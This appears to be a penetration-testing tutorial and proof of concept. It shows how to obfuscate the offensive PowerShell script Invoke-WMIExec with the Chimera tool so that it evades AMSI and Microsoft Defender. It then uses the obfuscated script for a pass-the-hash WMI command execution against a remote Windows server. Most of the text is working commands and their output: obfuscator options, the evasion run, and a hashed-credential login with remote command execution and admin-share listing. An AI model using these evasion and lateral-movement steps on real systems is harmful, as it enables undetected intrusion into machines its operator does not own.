=========================================================================================================================================================
Simple AV bypass using the PowerShell obfuscation script 'Chimera'
=========================================================================================================================================================

Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

=> Source: https://github.com/tokyoneon/Chimera

The objective is to use 'Chimera.sh' to obfuscate offensive powershell scripts so we can copy them on the disk of a target Windows laptop or Windows server   
and then run them without being detected and deleted by the Microsoft Defender AV (or other AV products).

Chimera uses several techniques to evade common detection signatures such as comment deletion/substitution, string substitution (variables, functions, data-types) and encoding. 


=========================================================================================================================================================
PoC - Example with the script 'Invoke-WMIExec.ps1' running on a Windows 10 laptop (fully patched with Defender AV enabled and up-to-date)
=========================================================================================================================================================

Step 1 - Obfuscate the script 'Invoke-WMIExec.ps1' with Chimera.sh on a Kali VM
----------------------------------------------------------------------------------

Source: https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1


jeff@kali:~/Documents/Tools/Chimera$ ./Chimera.sh 
    ░ ./chimera --file powershell.ps1 --all --output /tmp/payload.ps1

  files:
    -f, --file          powershell file.ps1 to obfuscate
    -o, --output        override default output file location

  options:
    -a, --all           same as: -l 0 -v -t -c -i -p -h -s -b -j -k -e
    -l, --level         level of string manipulation (0=random,1=low,
                        2=med,3=high,4=higher,5=insane. default: 0)
    -v, --variables     replace variables with arbitrary strings,
                        use -v </usr/share/dict/words> to utilize
                        custom wordlist as variable name substitutions
    -t, --typedata      replace data types with arbitrary strings (e.g.,
                        System.IO.StreamWriter). use -t <string,string> to
                        include more
    -c, --comments      replace comments with arbitrary strings
                        use -c <custom_comments.txt> to utillized custom
                        text instead of random strings
    -i, --insert        insert arbitrary comments into every line
    -h, --hex           convert ip addresses to hexidecimal values
    -s, --string        obfuscate provided strings, use -s <getstream,getstring>
    -b, --backticks     insert backticks into provided string, e.g., ne`w`-OB`je`cT
    -j, --functions     replace function names with arbitrary strings
    -d, --decimal       convert obfuscated payload to decimal format
                        improves AMSI evasion; increases AV detection
    -g, --nishang       remove nishang-specific characteristics
    -k, --keywords      search obfuscated output for words that may trigger
                        AV/VT. By default searches for common words (backdoor,
                        payload,nishang), use -k <word,word> to include more
    -r, --random        randomize character punctuation
    -p, --prepend       prepend random number of spaces to lines

  misc:
    -e, --examine       preview snippets of output file contents                                                                                           
    -q, --quiet         supress non-essential messages                                                                                                     
    -z, --no-art        if you hate awesome ascii art                                                                                                      
        --help          you're looking at it 


jeff@kali:~/Documents/Tools/Chimera$ ./Chimera.sh -f shells/Invoke-WMIExec.ps1 -l 4 -v -o /tmp/chimera-Invoke-WMI3x3c.ps1
 _____________________________________________________

  ░░░░░░ ░░   ░░ ░░ ░░░    ░░░ ░░░░░░░ ░░░░░░   ░░░░░
 ▒▒      ▒▒   ▒▒ ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒   ▒▒ ▒▒   ▒▒
 ▓▓      ▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓▓▓▓▓  ▓▓▓▓▓▓▓
 ██      ██   ██ ██ ██  ██  ██ ██      ██   ██ ██   ██
  ██████ ██   ██ ██ ██      ██ ███████ ██   ██ ██   ██
 _____________________________________________________

 ░ by @tokyoneon_

 ░ Starting chimera with level: 4

 ░ Variable Substitution 

  ░ Detected: 196 variables 

   ░ $xXLOfbujriPPfosdbqZjLFZqUoUHcySWZOSSXMVJ ... '$server_challenge_and_security_blob_bytes' 
   ░ $AAYheRhoprXdwOVFwIrMQhNOmoiJMhNTTXYAzOET ... '$packet_DCOM_remote_create_instance' 
   ░ $aXYQgGWGXhCtxTnwPZMpZeHpWgiclMBSeHqtidXj ... '$packet_DCOMRemoteCreateInstance' 
   ░ $htjxkbDYwUTBlPFqhPkKlvKWdBBeWDELEjMNXOTo ... '$WMI_client_random_port_stream' 
   ░ $auhPYZtafPKFmQbLSwTmzhFjdYpoOyuaPloLBAki ... '$packet_DCOMRemQueryInterface' 
   ░ $DzxBhFbotsyXnUQmGLvmeJTysuxfrQwNpJORbFZJ ... '$request_split_index_tracker' 
   ░ $tseDDQMeaUxELdBMDHZsLAzcpeYbfZruBudyQDYJ ... '$DCOM_remote_create_instance' 
   ░ $euTLOSGHOKftXZMwxZjDVqgsLBVnkpeWHnzODRnQ ... '$packet_rem_query_interface' 
   ░ $iPMwOWDusxYCqGgFWkFVYymwgWJjbsXEZPSktqIU ... '$WMI_random_port_end_index' 
   ░ $SnUokqPrhcdkndFSaaatjOOwPKoZfJxNRudGXQEW ... '$username_and_target_bytes' 
    ░ skipping                                     '$sequence_number_counter++' 
<SNIP>

   ░ $EdIKraywGBbueqXJgQHFcYjGxaEBsrrSWAAUMAxx ... '$OXID' 
    ░ skipping                                     '$null' 
   ░ $XwRXWaBhTnPGIFHoHmAUXRhZIKzHnJIuqeZzYQJN ... '$MEOW' 
   ░ $iuzbcOUerovFGDTewsxFKHXlggBKJLsUWETljOcH ... '$IPID' 
   ░ $MzEZDGEKejBbkVFZXJrgEYAiipaWnfMVHwIEOmej ... '$Hash' 
   ░ $cmlTADPVNeCsfEPNkYlsDJbQyazEPOvrbRVmuxSx ... '$hash' 
   ░ $wfBqvANYCXhUdrVylywdsjqkIannFhbDvHZdwQtp ... '$Data' 
   ░ $ZhBrdYeCDAJLTMuVRjyiohrEWlVbHGdHxUOkKOcq ... '$RPC' 
   ░ $ljMiRXTsSgqigoWHsTwaOnOAcPQTTAJjNMkwKHnQ ... '$MD5' 
   ░ $wuhAsWFMcrCkjKkRQpiQYFCbRbVVFsLHtsqPcCAJ ... '$i' 
    ░ skipping                                     '$_' 

 ░ Obfuscated file: /tmp/chimera-Invoke-WMI3x3c.ps1 


Important note : Do not delete the comment section before obfuscating the scripts as the name of the original parameters will be replaced by 
                 the obfuscated ones in this section and we will need to know them to run the script :-)

=> I scanned the file generated (chimera-Invoke-WMI3x3c.ps1) with the Microsoft Defender antivirus and it was not detected.


Step 2 - Check that the obfuscated 'Invoke-WMIExec.ps1' is working properly without being detected by the AMSI / Defender AV
-----------------------------------------------------------------------------------------------------------------------------

C:\Users\Administrator\Documents\Tools-AD>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Administrator\Documents\Tools-AD> . .\chimera-Invoke-WMI3x3c.ps1

PS C:\Users\Administrator\Documents\Tools-AD> Invoke-WMIExec -OpTOitJXLInfvfUGRukOjzjCnvYOItKHVjpEJcvMWrURMVgogWnJDeFwrXpGtoALpwBRbbeDkJJMfEBBdEuWejDSfjtSiefpybuGJjdNZquJCapQWhQzNRTpeqSNkwPbszVUuUtnQzLbugOWOOzpPGhuiVMOiBLUrXioMYfXFvaOlidXYjwMxAlDULaetfimaNVpueXCWMjXbEriUkgnUzhVpXxEcsTUbjZpzXTZvUqDddFKwvAVNHtMDMIijymiSfPZAOVSWRMrADneVfhUwbhjqIGTexQPQQvPZ 192.168.1.51 
-kcYfatHpXuZxTvlsOwXOSxLCzAmuusaDtpkzGTuVZzWbKYFzaOaPHrXwjwZTTampVlytxxxnkxLKSBNGNqXlLyokpFrHozktfkOMAAQbrcqNjStotmzxOLbmjWOQLdqSKPTlOeMZScQgSTfvPPvgIrAItPUcjqwPIvwreDxhuVIMRlbdkWHCLzeTQHqdcESNTSmzuFtLTngApswMdpUpIlSjIUnJRWiHioiFxTvmMasEtNAUPlLYnhkKgVJsJkUARZTnUoxZdnwJBxmQQfiMs administrator 
-sRBcBxzUTJFcKjnJeSwScOTSTJyGiaNoGUNJDbwzExpfYXUIFnlVdKBMoaYpdtZrivHqUYZIIJvKrYMpaZSpvyDnQDHMRcVjMwjTZGkWIKfsJWBOeuzHvMfnoeSeUiUrkjrcuRSNPtcAXstQPkhhQNfkxHIxKfertnzGVDiFWPpSyPkkGXDoERMXEjpQgaXpKachuBDiSsyNqfcUbqRkITSKladkcsxLGbPYnpIlGjzgOoZqSgvmSiSPfubPhCPtq cf3a5525ee9414229e66279623ed5c58

[+] administrator accessed WMI on 192.168.1.51

=> The obfuscated script is working !


PS C:\Users\Administrator\Documents\Tools-AD> Invoke-WMIExec -OpTOitJXLInfvfUGRukOjzjCnvYOItKHVjpEJcvMWrURMVgogWnJDeFwrXpGtoALpwBRbbeDkJJMfEBBdEuWejDSfjtSiefpybuGJjdNZquJCapQWhQzNRTpeqSNkwPbszVUuUtnQzLbugOWOOzpPGhuiVMOiBLUrXioMYfXFvaOlidXYjwMxAlDULaetfimaNVpueXCWMjXbEriUkgnUzhVpXxEcsTUbjZpzXTZvUqDddFKwvAVNHtMDMIijymiSfPZAOVSWRMrADneVfhUwbhjqIGTexQPQQvPZ 192.168.1.51 
-CTdwzKCSeSYcZIlioSobxhwugKpZbUCfpPnDOdEZcVXdcfYTpslnEQlPZxcaVtazIrSQezSCRpqSBBOzTMUExzuCDGInVXxgsvUoKKsIfGCGZDfDvxaeBQsBNwJKgJSeuLjDApzhKdBlAyGyGnuNNsyhfeoVbulsLgxKrINPkCCOsElJClFZBSeuviYHRfrPKVIjucawKkdOtMbBcsPfENHTdSaGNtyPfVnFHUIBGUDQAubuqujrnBafRSPvbLshEKtCjWYLbKmKQdbCBHDjgOLbXIkZtRkIDeQCsjRsxdTCefmd . 
-kcYfatHpXuZxTvlsOwXOSxLCzAmuusaDtpkzGTuVZzWbKYFzaOaPHrXwjwZTTampVlytxxxnkxLKSBNGNqXlLyokpFrHozktfkOMAAQbrcqNjStotmzxOLbmjWOQLdqSKPTlOeMZScQgSTfvPPvgIrAItPUcjqwPIvwreDxhuVIMRlbdkWHCLzeTQHqdcESNTSmzuFtLTngApswMdpUpIlSjIUnJRWiHioiFxTvmMasEtNAUPlLYnhkKgVJsJkUARZTnUoxZdnwJBxmQQfiMs administrator 
-sRBcBxzUTJFcKjnJeSwScOTSTJyGiaNoGUNJDbwzExpfYXUIFnlVdKBMoaYpdtZrivHqUYZIIJvKrYMpaZSpvyDnQDHMRcVjMwjTZGkWIKfsJWBOeuzHvMfnoeSeUiUrkjrcuRSNPtcAXstQPkhhQNfkxHIxKfertnzGVDiFWPpSyPkkGXDoERMXEjpQgaXpKachuBDiSsyNqfcUbqRkITSKladkcsxLGbPYnpIlGjzgOoZqSgvmSiSPfubPhCPtq cf3a5525ee9414229e66279623ed5c58 
-ICFeGvQrfhcOdQHtieOKLgPnUXMAPiAURyXrfQnuWwmwAAcFmMVdFLBTGNyMdShFMnrlurvJMYKagPtPgmbjcyjmwaksvdWgbtkzreniRIRkhnwmukTVsKaHpokaYCfQlddOpSZQbAQhfWjyCQVVcPUCfTjltGiSmtIPcLsdQZwmnjhUmXxCFHmeUkDhQEgOYxMnlRgOzWmrYtcCATOmRBfsfZwIrLqpjycCjRdxsipyRnlwwkSsSIfxIFOpewAHrhtZHxTvJcXtuchWNOerlJHMCjnouGFwGNDRFerJwinHPjINRlsegCoSacpYeTu "cmd /c echo pentest > C:\pentest.txt" -verbose
VERBOSE: Connecting to 192.168.1.51:135
VERBOSE: WMI reports target hostname as Oracleserver1
VERBOSE: [+] .\administrator accessed WMI on 192.168.1.51
VERBOSE: [*] Using Oracleserver1 for random port extraction
VERBOSE: [*] Connecting to 192.168.1.51:49666
VERBOSE: [*] Attempting command execution
<SNIP>
[+] Command executed with process ID 4392 on 192.168.1.51

Start-lYfBbUyBkspeXAIwaaeznMhNvFWxgxdGyZeaTudPkhLfIhLXnYcwyieKokhihrFEbNFfxhFgihKzFvwBjZOkHUGNkdaFPBatcajSTSsgAuHIXkJYPZfiCZZHGSxsxtTHAAoHlfUBsLSLonpdkASruTguHpSBeErLSwWaK
RmFCtdDqSHOgXtZccTPQGqwzRapVlzMoTkqQuxcOIvvhUbxMAHafedwaxWVcHUouUdrOvUaKRkNPwGYdBHzEiBALPOPKaxCxcAWdUYHBKbWAhlsgsUjmmBYFhbotJBQFZsTqlFvYBbtKGTbzcaR : The term 'Start-lYfBb
UyBkspeXAIwaaeznMhNvFWxgxdGyZeaTudPkhLfIhLXnYcwyieKokhihrFEbNFfxhFgihKzFvwBjZOkHUGNkdaFPBatcajSTSsgAuHIXkJYPZfiCZZHGSxsxtTHAAoHlfUBsLSLonpdkASruTguHpSBeErLSwWaKRmFCtdDqSHO
gXtZccTPQGqwzRapVlzMoTkqQuxcOIvvhUbxMAHafedwaxWVcHUouUdrOvUaKRkNPwGYdBHzEiBALPOPKaxCxcAWdUYHBKbWAhlsgsUjmmBYFhbotJBQFZsTqlFvYBbtKGTbzcaR' is not recognized as the name of
a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\Administrator.PO718687\Documents\Tools-AD\chimera-Invoke-WMI3x3c.ps1:1470 char:17
+ ...             Start-lYfBbUyBkspeXAIwaaeznMhNvFWxgxdGyZeaTudPkhLfIhLXnYc ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Start-lYfBbUyBk...lFvYBbtKGTbzcaR:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException


=> Several error messages were displayed in the PowerShell session but the command "cmd /c echo pentest > C:\pentest.txt" was successfully executed
on the remote Windows server 2016 via WMI.

PS C:\Users\Administrator\Documents\Tools-AD> ls \\192.168.1.51\C$\

Directory: \\192.168.1.51\C$

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        02/09/2022     01:08                app
d-----        16/07/2016     15:23                PerfLogs
d-r---        13/11/2022     10:39                Program Files
d-----        02/09/2022     00:59                Program Files (x86)
d-----        24/10/2022     10:45                temp
d-r---        02/09/2022     01:21                Users
d-----        13/11/2022     11:12                Windows
-a----        13/11/2022     12:40             10 pentest.txt
